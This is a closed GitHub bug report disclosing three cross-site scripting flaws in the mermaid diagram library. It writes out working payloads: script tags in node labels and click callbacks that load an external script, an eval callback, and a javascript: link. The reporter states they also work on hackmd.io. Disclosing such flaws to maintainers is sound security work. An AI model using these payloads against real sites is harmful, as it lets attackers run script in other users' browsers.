-
-
Notifications
You must be signed in to change notification settings - Fork 8k
Closed
Labels
Type: Bug / ErrorSomething isn't working or is incorrectSomething isn't working or is incorrect
Description
Hi, I found XSS issues in mermaid. This affects all the projects that use mermaid.
There are three different ways to trigger.
The first one:
graph TD
B --> C{<script src=https://www.google-analytics.com/gtm/js?id=GTM-TQ6RV7G ></script>}
The second one:
graph LR;
A-->B;
click B callback "<script src=https://www.google-analytics.com/gtm/js?id=GTM-TQ6RV7G ></script>"
The third one(needs click, both nodes will work):
graph LR;
alert`md5_salt`-->B;
click alert`md5_salt` eval "Tooltip for a callback"
click B "javascript:alert`salt`" "This is a tooltip for a link"
Here is an example that affects other projects which using mermaid.
hackmdio/codimd#1233
And all above three payload would work on hackmd.io
Hope you can fix soon!
Metadata
Metadata
Assignees
Labels
Type: Bug / ErrorSomething isn't working or is incorrectSomething isn't working or is incorrect